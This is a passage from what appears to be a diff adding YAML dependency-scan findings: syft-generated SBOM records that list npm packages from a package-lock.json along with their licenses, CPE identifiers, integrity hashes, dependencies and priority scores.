javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:jonschlinkert:anymatch:3.1.3:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/anymatch@3.1.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz + integrity: sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw== + dependencies: + normalize-path: ^3.0.0 + picomatch: ^2.0.4 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c5e1f2e50730714b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: append-field 1.0.0' + title: append-field 1.0.0 + description: 'Package discovered: append-field 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 02ed6bf0c016d0d3 + name: append-field + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:append-field:append-field:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:append-field:append_field:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:append_field:append-field:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:append_field:append_field:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:append:append-field:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:append:append_field:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/append-field@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/append-field/-/append-field-1.0.0.tgz + integrity: sha512-klpgFSWLW1ZEs8svjfb7g4qWY0YS5imI82dTg+QahUvJ8YqAY0P10Uk8tTyh9ZGuYEZEMaeJYCF5BFuX552hsw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 413f489faf894e63 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: arg 5.0.2' + title: arg 5.0.2 + description: 'Package discovered: arg 5.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c190b80836cef557 + name: arg + version: 5.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:arg:arg:5.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/arg@5.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/arg/-/arg-5.0.2.tgz + integrity: sha512-PYjyFOLKQ9y57JvQ6QLo8dAgNqswh8M1RMJYdQduT6xbWSgK36P/Z/v+p888pM69jMMfS8Xd8F6I1kQ/I9HUGg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0ee2786b2f8f8ad4 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: array-flatten 1.1.1' + title: array-flatten 1.1.1 + description: 'Package discovered: array-flatten 1.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f61b69e470287928 + name: array-flatten + version: 1.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:array-flatten:array-flatten:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:array-flatten:array_flatten:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:array_flatten:array-flatten:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:array_flatten:array_flatten:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:array:array-flatten:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:array:array_flatten:1.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/array-flatten@1.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz + integrity: sha512-PCVAQswWemu6UdxsDFFX/+gVeYqKAod3D3UVm91jHwynguOwAvYPhx8nNlM++NqRcK6CxxpUafjmhIdKiHibqg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 374f7e7db72708e5 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: arrify 2.0.1' + title: arrify 2.0.1 + description: 'Package discovered: arrify 2.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e733388ffa39ebc5 + name: arrify + version: 2.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:arrify:arrify:2.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/arrify@2.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/arrify/-/arrify-2.0.1.tgz + integrity: sha512-3duEwti880xqi4eAMN8AyR4a0ByT90zoYdLlevfrvU43vb0YZwZVfxOgxWrLXXXpyugL0hNZc9G6BiB5B3nUug== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e3ccd8258c57c2f8 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: async-retry 1.3.3' + title: async-retry 1.3.3 + description: 'Package discovered: async-retry 1.3.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3f1747f861c5fded + name: async-retry + version: 1.3.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:async-retry:async-retry:1.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:async-retry:async_retry:1.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:async_retry:async-retry:1.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:async_retry:async_retry:1.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:async:async-retry:1.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:async:async_retry:1.3.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/async-retry@1.3.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/async-retry/-/async-retry-1.3.3.tgz + integrity: sha512-wfr/jstw9xNi/0teMHrRW7dsz3Lt5ARhYNZ2ewpadnhaIp5mbALhOAP+EAdsC7t4Z6wqsDVv9+W6gm1Dk9mEyw== + dependencies: + retry: 0.13.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c5b9a7358fc490f2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: asynckit 0.4.0' + title: asynckit 0.4.0 + description: 'Package discovered: asynckit 0.4.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3f371bd1625a90e5 + name: asynckit + version: 0.4.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:asynckit:asynckit:0.4.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/asynckit@0.4.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz + integrity: sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b5ad0267f42a44eb + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: autoprefixer 10.5.0' + title: autoprefixer 10.5.0 + description: 'Package discovered: autoprefixer 10.5.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9d0845c4768cfcf5 + name: autoprefixer + version: 10.5.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:autoprefixer:autoprefixer:10.5.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/autoprefixer@10.5.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/autoprefixer/-/autoprefixer-10.5.0.tgz + integrity: sha512-FMhOoZV4+qR6aTUALKX2rEqGG+oyATvwBt9IIzVR5rMa2HRWPkxf+P+PAJLD1I/H5/II+HuZcBJYEFBpq39ong== + dependencies: + browserslist: ^4.28.2 + caniuse-lite: ^1.0.30001787 + fraction.js: ^5.3.4 + picocolors: ^1.1.1 + postcss-value-parser: ^4.2.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: fba99cf19e7cc071 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: axios 1.15.2' + title: axios 1.15.2 + description: 'Package discovered: axios 1.15.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 691f5259c0d155d0 + name: axios + version: 1.15.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:axios:axios:1.15.2:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/axios@1.15.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/axios/-/axios-1.15.2.tgz + integrity: sha512-wLrXxPtcrPTsNlJmKjkPnNPK2Ihe0hn0wGSaTEiHRPxwjvJwT3hKmXF4dpqxmPO9SoNb2FsYXj/xEo0gHN+D5A== + dependencies: + follow-redirects: ^1.15.11 + form-data: ^4.0.5 + proxy-from-env: ^2.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 15b2afab0d6c8b1b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: balanced-match 1.0.2' + title: balanced-match 1.0.2 + description: 'Package discovered: balanced-match 1.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0d7c80c1e227b7e2 + name: balanced-match + version: 1.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:balanced-match:balanced-match:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:balanced-match:balanced_match:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:balanced_match:balanced-match:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:balanced_match:balanced_match:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:balanced:balanced-match:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:balanced:balanced_match:1.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/balanced-match@1.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz + integrity: sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e3263834d404d719 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: base64-js 0.0.8' + title: base64-js 0.0.8 + description: 'Package discovered: base64-js 0.0.8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b2d621b6dd16cf05 + name: base64-js + version: 0.0.8 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:base64-js:base64-js:0.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:base64-js:base64_js:0.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:base64_js:base64-js:0.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:base64_js:base64_js:0.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:base64:base64-js:0.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:base64:base64_js:0.0.8:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/base64-js@0.0.8 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/base64-js/-/base64-js-0.0.8.tgz + integrity: sha512-3XSA2cR/h/73EzlXXdU6YNycmYI7+kicTxks4eJg2g39biHR84slg2+des+p7iHYhbRg/udIS4TD53WabcOUkw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 277066fc01f56c50 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: base64-js 1.5.1' + title: base64-js 1.5.1 + description: 'Package discovered: base64-js 1.5.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c7ab39b9720e240f + name: base64-js + version: 1.5.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:base64-js:base64-js:1.5.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:base64-js:base64_js:1.5.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:base64_js:base64-js:1.5.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:base64_js:base64_js:1.5.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:base64:base64-js:1.5.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:base64:base64_js:1.5.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/base64-js@1.5.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz + integrity: sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d8b667ce3a0cff7b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: base64id 2.0.0' + title: base64id 2.0.0 + description: 'Package discovered: base64id 2.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 224462b6727019f7 + name: base64id + version: 2.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:base64id:base64id:2.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/base64id@2.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/base64id/-/base64id-2.0.0.tgz + integrity: sha512-lGe34o6EHj9y3Kts9R4ZYs/Gr+6N7MCaMlIFA3F1R2O5/m7K06AxfSeO5530PEERE6/WyEg3lsuyw4GHlPZHog== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b03c61c0d46ca441 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: baseline-browser-mapping 2.10.24' + title: baseline-browser-mapping 2.10.24 + description: 'Package discovered: baseline-browser-mapping 2.10.24' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 013c8659dba6bad8 + name: baseline-browser-mapping + version: 2.10.24 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:baseline-browser-mapping:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:baseline-browser-mapping:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:baseline_browser_mapping:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:baseline_browser_mapping:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:baseline-browser:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:baseline-browser:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:baseline_browser:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:baseline_browser:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:baseline:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:baseline:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/baseline-browser-mapping@2.10.24 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/baseline-browser-mapping/-/baseline-browser-mapping-2.10.24.tgz + integrity: sha512-I2NkZOOrj2XuguvWCK6OVh9GavsNjZjK908Rq3mIBK25+GD8vPX5w2WdxVqnQ7xx3SrZJiCiZFu+/Oz50oSYSA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 83b4bdfed9e1341d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: basic-auth 2.0.1' + title: basic-auth 2.0.1 + description: 'Package discovered: basic-auth 2.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3e5df9b4f6b62db4 + name: basic-auth + version: 2.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:basic-auth:basic-auth:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:basic-auth:basic_auth:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:basic_auth:basic-auth:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:basic_auth:basic_auth:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:basic:basic-auth:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:basic:basic_auth:2.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/basic-auth@2.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/basic-auth/-/basic-auth-2.0.1.tgz + integrity: sha512-NF+epuEdnUYVlGuhaxbbq+dvJttwLnGY+YixlXlME5KpQ5W3CnXA5cVTneY3SPbPDRkcjMbifrwmFYcClgOZeg== + dependencies: + safe-buffer: 5.1.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 673442d13a9240b9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: bcryptjs 2.4.3' + title: bcryptjs 2.4.3 + description: 'Package discovered: bcryptjs 2.4.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 06243f2e41cd3912 + name: bcryptjs + version: 2.4.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:bcryptjs:bcryptjs:2.4.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/bcryptjs@2.4.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/bcryptjs/-/bcryptjs-2.4.3.tgz + integrity: sha512-V/Hy/X9Vt7f3BbPJEi8BdVFMByHi+jNXrYkW3huaybV/kQ0KJg0Y6PkEMbn+zeT+i+SiKZ/HMqJGIIt4LZDqNQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b36a32eeee7b64f7 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + 